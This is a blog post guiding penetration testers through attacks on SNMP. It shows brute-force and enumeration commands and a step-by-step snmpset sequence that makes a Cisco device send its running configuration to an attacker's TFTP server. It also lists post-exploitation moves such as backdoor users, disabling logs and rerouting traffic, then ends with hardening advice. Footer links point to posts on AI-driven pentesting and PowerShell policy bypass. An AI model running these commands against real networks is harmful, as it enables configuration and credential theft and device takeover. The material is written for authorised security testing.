A Pentester's Guide to SNMP: Exploitation, Misconfigurations, and Hardening

-

Introduction to the Simple Network Management Protocol (SNMP)

The Simple Network Management Protocol (SNMP) is a widely used Internet Standard protocol for managing and monitoring devices on IP networks. While essential for network administration, its often-insecure default configurations and legacy versions present a rich attack surface for penetration testers, bug bounty hunters, and red teamers. This article provides a comprehensive guide to understanding, enumerating, and exploiting SNMP, covering all protocol versions, common misconfigurations, notable vulnerabilities with public proofs-of-concept (PoCs), and an extensive deep-dive into attacking the more modern SNMPv3.

SNMP Ports and Versions

SNMP primarily operates over the User Datagram Protocol (UDP) on two standard ports:

  • Port 161/UDP: The default port where SNMP agents listen for incoming requests.
  • Port 162/UDP: The default port where SNMP managers receive asynchronous traps (notifications) from agents.

Understanding the differences between the three major SNMP versions is crucial for assessing their security posture.

Feature SNMPv1 SNMPv2c SNMPv3
Security Community String (Plaintext) Community String (Plaintext) User-based Security Model (USM)
Encryption None None DES, 3DES, AES
Authentication None None MD5, SHA-1, SHA-2
Status Obsolete and insecure Widely used but insecure Current standard, recommended

SNMP Enumeration: Uncovering the Attack Surface

Effective enumeration is the foundation of any successful SNMP assessment. The goal is to discover active SNMP services, identify community strings or valid users, and extract as much information as possible about the target systems and network.

Community String Enumeration (SNMPv1/v2c)

For legacy versions, finding the community string is the primary objective.

Common Default Community Strings: public (read-only), private (read-write), manager, admin, community.

Brute-Forcing Tools:

  • Nmap snmp-brute script: 
    nmap -sU -p 161 --script snmp-brute --script-args snmp-brute.communitiesdb=wordlist.txt <target>
  • onesixtyone: 
    onesixtyone -c /path/to/wordlist.txt <target>
  • Metasploit snmp_login module: 
    msf > use auxiliary/scanner/snmp/snmp_login

System and Network Information Enumeration

With a valid community string or user credentials, you can begin extracting a wealth of information.

  • snmpwalk: Traverses the Management Information Base (MIB) tree. 
    snmpwalk -c public -v2c <target>
  • snmp-check: Provides a human-readable output. 
    snmp-check -t <target> -c public
  • Nmap NSE Scripts: Use scripts like snmp-sysdescr, snmp-interfaces, snmp-processes, and snmp-netstat for detailed enumeration.

Deep Dive: Attacking SNMPv3

SNMPv3 introduced a robust security model, but it's not without its flaws and implementation weaknesses. A determined attacker has several avenues to compromise it.

Understanding the SNMPv3 Security Model

SNMPv3's User-based Security Model (USM) provides three security levels:

  • noAuthNoPriv: No authentication, no privacy. Essentially the same as SNMPv2c.
  • authNoPriv: Authentication (via MD5 or SHA) but no encryption. Protects against message modification and spoofing but not eavesdropping.
  • authPriv: Authentication and privacy (encryption via DES, 3DES, or AES). The most secure level.

SNMPv3 Username Enumeration: The Achilles' Heel

A critical design flaw in many SNMPv3 implementations allows for username enumeration. The device provides different error messages for invalid usernames versus valid usernames with incorrect passwords. This is a classic user enumeration vulnerability.

  • Request with Invalid Username: snmpwalk -v 3 -l noAuthNoPriv -u "invaliduser" <target>
    Response: snmpwalk: Unknown user name
  • Request with Valid Username: snmpwalk -v 3 -l noAuthNoPriv -u "validuser" <target>
    Response: Error in packet. Reason: authorizationError

This behavior allows an attacker to build a list of valid usernames before attempting to crack passwords.

Tools for SNMPv3 Enumeration and Brute-Force

1. snmpwn

A powerful Ruby-based tool that automates the entire process of SNMPv3 user enumeration and password cracking.

# Enumerate users and then brute-force passwords
./snmpwn.rb --hosts hosts.txt --users users.txt --passlist passwords.txt

2. snmpv3brute

This Python tool specializes in offline password cracking by analyzing captured SNMPv3 packets. This is highly effective as it avoids network detection and account lockouts.

# Capture SNMPv3 traffic first
tcpdump -i eth0 -w snmp_capture.pcap udp port 161

# Run the offline brute-force attack
python3 snmpv3brute.py -w wordlist.txt -p snmp_capture.pcap

The tool works by extracting the necessary authentication parameters (EngineID, auth parameters, and the full message) from a single captured packet and then iterating through a wordlist to find the correct password.

3. Metasploit Framework

Metasploit offers modules for both enumeration and brute-forcing.

# SNMPv3 User Enumeration
msf > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(snmp_enumusers) > set VERSION 3

# SNMPv3 Login Brute-Force
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set VERSION 3

SNMP Exploitation: From Information to Control

Information Disclosure (Read-Only Access)

Even with only read-only access, an attacker can map the internal network, discover running services, and identify potential targets by extracting routing tables, ARP caches, process lists, and user accounts.

Write Access Exploitation (Read-Write Access)

Gaining read-write access is the holy grail. It allows direct manipulation of the device's configuration.

  • Changing System Name: A simple test to confirm write access. 
    snmpset -v2c -c private <target> .1.3.6.1.2.1.1.5.0 s "PwnedSystem"
  • Cisco Configuration Exfiltration: A classic attack to force a Cisco device to upload its configuration to an attacker-controlled TFTP server.

Scenario-Based Exploitation: Leaked Read-Write Credentials

Gaining read-write (RW) access to a device via SNMP is a critical security failure and a dream scenario for an attacker. This section provides a step-by-step guide on how to proceed once you have obtained RW credentials, covering both legacy SNMPv1/v2c and modern SNMPv3 scenarios.

Scenario 1: Leaked SNMPv1/v2c Read-Write Community String

Let's assume you have discovered a read-write community string, for example, from a leaked configuration file containing the line:

Leaked Configuration: snmp-server community secret123 RW

This line from a Cisco IOS configuration file defines a community string secret123 with read-write permissions. Here is a complete attack path from discovery to full compromise.

Step 1: Verify Read-Write Access

First, confirm that the community string actually provides write access. A simple, non-disruptive way to do this is to try changing a harmless value, like the system contact or name. If the command succeeds, you have confirmed RW access.

# Check the current system name
snmpget -v2c -c secret123 <target_ip> .1.3.6.1.2.1.1.5.0

# Attempt to change the system name
snmpset -v2c -c secret123 <target_ip> .1.3.6.1.2.1.1.5.0 s "PwnedSystem"

# Verify the change
snmpget -v2c -c secret123 <target_ip> .1.3.6.1.2.1.1.5.0
# Expected output should show "PwnedSystem"

Step 2: Full System Enumeration

With confirmed RW access, perform a deep enumeration of the device to gather all possible information. This will inform your next steps and help you understand the device's role in the network.

# Use snmp-check for a comprehensive overview
snmp-check -t <target_ip> -c secret123

# Walk the entire MIB tree and save the output for later analysis
snmpwalk -v2c -c secret123 <target_ip> > snmp_dump.txt

Analyze the output for routing tables, ARP caches, running processes, user accounts, and any other sensitive data.

Step 3: The Ultimate Goal - Configuration Exfiltration (Cisco IOS)

The most devastating attack with SNMP RW access on a Cisco device is to force it to upload its configuration file to an attacker-controlled TFTP server. This configuration file contains a goldmine of information, including plaintext passwords, VPN pre-shared keys, and network topology details.

Attack Workflow: Cisco Configuration Download via SNMP and TFTP

1. Set up your TFTP Server:

On your attacker machine (e.g., Kali Linux), install and run a TFTP server.

# Install atftpd
sudo apt-get install atftpd

# Create a TFTP directory and start the server
mkdir /tftp
chmod 777 /tftp
sudo atftpd --daemon --port 69 /tftp

2. Execute the SNMP `snmpset` Commands:

This sequence of commands instructs the Cisco device to copy its running configuration to your TFTP server. You will need the OIDs for the Cisco-specific MIBs that control this process.

# OID Reference:
# ccCopyProtocol: 1.3.6.1.4.1.9.9.96.1.1.1.1.2
# ccCopySourceFileType: 1.3.6.1.4.1.9.9.96.1.1.1.1.3
# ccCopyDestFileType: 1.3.6.1.4.1.9.9.96.1.1.1.1.4
# ccCopyServerAddress: 1.3.6.1.4.1.9.9.96.1.1.1.1.5
# ccCopyFileName: 1.3.6.1.4.1.9.9.96.1.1.1.1.6
# ccCopyEntryRowStatus: 1.3.6.1.4.1.9.9.96.1.1.1.1.14

ATTACKER_IP="<your_tftp_server_ip>"
TARGET_IP="<target_device_ip>"
COMMUNITY="secret123"

# 1. Set the protocol to TFTP (value=1)
snmpset -v2c -c $COMMUNITY $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.2.1 i 1

# 2. Set the source file type to running-config (value=4)
snmpset -v2c -c $COMMUNITY $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.3.1 i 4

# 3. Set the destination file type to network file (value=1)
snmpset -v2c -c $COMMUNITY $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.4.1 i 1

# 4. Set the TFTP server IP address to your attacker machine
snmpset -v2c -c $COMMUNITY $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.1 a $ATTACKER_IP

# 5. Set the destination filename
snmpset -v2c -c $COMMUNITY $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.6.1 s "cisco-config-backup"

# 6. Activate the copy process by setting the row status to 'active' (value=4)
snmpset -v2c -c $COMMUNITY $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.14.1 i 4

3. Check your TFTP Server:

If the commands were successful, the Cisco device's running configuration will appear in your /tftp directory. You can now analyze this file for sensitive information.

ls -l /tftp
cat /tftp/cisco-config-backup

Step 4: Further Exploitation Paths

  • Denial of Service: Shut down critical interfaces.
  • Configuration Modification: Add a backdoor user account, change ACLs to allow further access, or modify routing tables to redirect traffic.
  • Network Pivoting: Use the detailed information from the configuration and MIB dump to launch attacks against other devices on the network.

Scenario 2: Leaked SNMPv3 Read-Write User Credentials

Now, let's assume you have compromised a set of SNMPv3 credentials with read-write access. This is more complex due to the authentication and privacy layers.

Leaked Credentials:
  • Username: netadmin
  • Security Level: authPriv
  • Authentication Protocol: SHA
  • Authentication Password: S3cureAuthP@ss!
  • Privacy Protocol: AES
  • Privacy Password: EvenM0reS3curePrivP@ss!

The exploitation path is similar to the v1/v2c scenario, but all commands must now include the proper SNMPv3 authentication and privacy parameters.

Step 1: Verify Read-Write Access with SNMPv3

Use `snmpset` with the full set of v3 credentials to attempt a modification.

# Define variables for clarity
TARGET_IP="<target_device_ip>"
USER="netadmin"
AUTH_PROTO="SHA"
AUTH_PASS="S3cureAuthP@ss!"
PRIV_PROTO="AES"
PRIV_PASS="EvenM0reS3curePrivP@ss!"

# Attempt to change the system contact information
snmpset -v 3 -l authPriv -u $USER -a $AUTH_PROTO -A "$AUTH_PASS" -x $PRIV_PROTO -X "$PRIV_PASS" $TARGET_IP .1.3.6.1.2.1.1.4.0 s "security@attacker.com"

If the command executes without error, you have confirmed your RW credentials are valid.

Step 2: Configuration Exfiltration with SNMPv3

The same Cisco configuration download attack can be performed using SNMPv3. You simply need to add the v3 parameters to each `snmpset` command.

# Example: Setting the TFTP server IP with SNMPv3
snmpset -v 3 -l authPriv -u $USER -a $AUTH_PROTO -A "$AUTH_PASS" -x $PRIV_PROTO -X "$PRIV_PASS" $TARGET_IP 1.3.6.1.4.1.9.9.96.1.1.1.1.5.1 a $ATTACKER_IP

You would repeat this for all the steps outlined in the v1/v2c scenario, adding the SNMPv3 flags to each command.

Step 3: Advanced Post-Exploitation

With SNMPv3 RW access, you can perform more subtle and persistent attacks:

  • Create a Shadow Admin: Add a new SNMPv3 user with RW privileges that the legitimate administrators may not notice.
  • Modify Logging Configuration: Change the logging server to one you control to capture syslog messages, or disable logging entirely to cover your tracks.
  • Manipulate Network Traffic: Modify routing tables or ACLs to perform man-in-the-middle attacks or exfiltrate data.

Having read-write access via SNMP, regardless of the version, is a critical vulnerability that often leads to full device and network compromise. The ability to directly read and write the device's configuration provides an attacker with unparalleled control.

Notable SNMP CVEs with Proof-of-Concepts

CVE Description Impact PoC/Exploit
CVE-2017-6736 Cisco IOS SNMP Remote Code Execution RCE Exploit-DB ID: 43450 (Python script)
CVE-2008-0960 SNMPv3 HMAC Authentication Bypass Auth Bypass Conceptual, involves crafted packets
CVE-2025-20352 Cisco IOS XE SNMP RCE RCE Actively exploited in the wild (Operation Zero Disco)

Hardening SNMP: Best Practices

  • Always Use SNMPv3: Immediately migrate away from SNMPv1 and v2c.
  • Enforce `authPriv`: Use the highest security level, requiring both authentication and encryption.
  • Strong Credentials: Use long, complex, and unique passwords for authentication and privacy. Never reuse them.
  • Implement ACLs: Restrict SNMP access to a small, well-defined set of management stations.
  • Network Segmentation: Isolate SNMP traffic on a separate, out-of-band management network.
  • Use SNMP Views: Follow the principle of least privilege by defining views that restrict which MIBs can be accessed by specific users.
  • Disable if Unused: If SNMP is not actively used for monitoring, disable it entirely.

Conclusion

SNMP, particularly its legacy versions, remains a fruitful avenue for network exploitation. However, even the more secure SNMPv3 is susceptible to attack through design flaws like user enumeration and weak credential management. By understanding the full spectrum of enumeration and exploitation techniques, from community string brute-forcing to offline SNMPv3 password cracking, security professionals can effectively assess and secure this ubiquitous management protocol.

References

  1. Hackviser: SNMP Pentesting
  2. GitHub: hatlord/snmpwn
  3. GitHub: applied-risk/snmpv3brute
  4. Raesene's Ramblings: Testing SNMPv3
  5. Exploit-DB: Cisco IOS RCE (43450)
  6. CISA: Reducing the Risk of SNMP Abuse

Comments

Post a Comment

Popular posts from this blog

Tutorial: Build an AI Penetration Tester with Claude (MCP + Burp)

-
Tutorial: Build an AI Penetration Tester with Claude (MCP + Burp) 🤖 Build Your Own AI Penetration Tester: Claude + MCP + Burp Suite A complete step-by-step tutorial to replicate autonomous security testing (25 labs + 2 BSCP exams solved) ⚡ Inspired by "Sonnet Took the Exam. I Just Watched." Originally published on Notion · Tutorial expanded for hands-on replication 🎯 What you'll build: An autonomous AI agent (Claude Sonnet 4.6) that can browse web apps via Playwright, inspect raw HTTP traffic via Burp Suite, and chain XSS → SQLi → RCE to solve PortSwigger labs — completely on its own. 📚 Table of Contents Overview & Architecture Prerequisites & Hardware Step 1: Install Claude Code & MCP Step 2: Configure Playwright MCP Server Step 3: Burp Suite & Burp MCP Integration ...
Read more

InfluxDB TCP 8086 (Default) — Authentication Bypass & Pentest Notes

-
``` Target: InfluxDB (port 8086) Affected versions: < 1.7.6 (CVE-2019-20933) Vulnerability description InfluxDB versions prior to 1.7.6 contain an authentication bypass in the authenticate function in services/httpd/handler.go . A crafted JWT token may contain an empty SharedSecret , allowing an attacker to bypass authentication and perform sensitive actions such as reading internal metrics, modifying data, or executing administrative operations. Risk No formal risk description available in original advisory. Impact depends on exposed instance and data sensitivity. Recommendation Upgrade to influxdb version 1.7.6~rc0-1 or later. Apply vendor-provided patches and restrict access to port 8086 with network controls. References Exploit: LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933 CVE-2019-20933 — MITRE NVD — CVE-2019-20933 InfluxData patch commit Exploitation ...
Read more

Mastering PowerShell Execution Policy Bypass

-
📋 Table of Contents 1. Introduction to PowerShell Execution Policies 2. Understanding Execution Policy Mechanisms 3. Basic Bypass Techniques 4. Advanced Bypass Methods 5. PowerShell Script Signing 6. Converting PowerShell to Executables 7. Advanced Obfuscation Techniques 8. Steganographic Delivery Systems 9. Bypassing Reputation-Based Protection 10. Practical Implementation Scenarios 11. Detection Evasion Strategies 12. Conclusion and Best Practices 🔒 Introduction to PowerShell Execution Policies This guide is used in professional penetration testing training and aligns with MITR...
Read more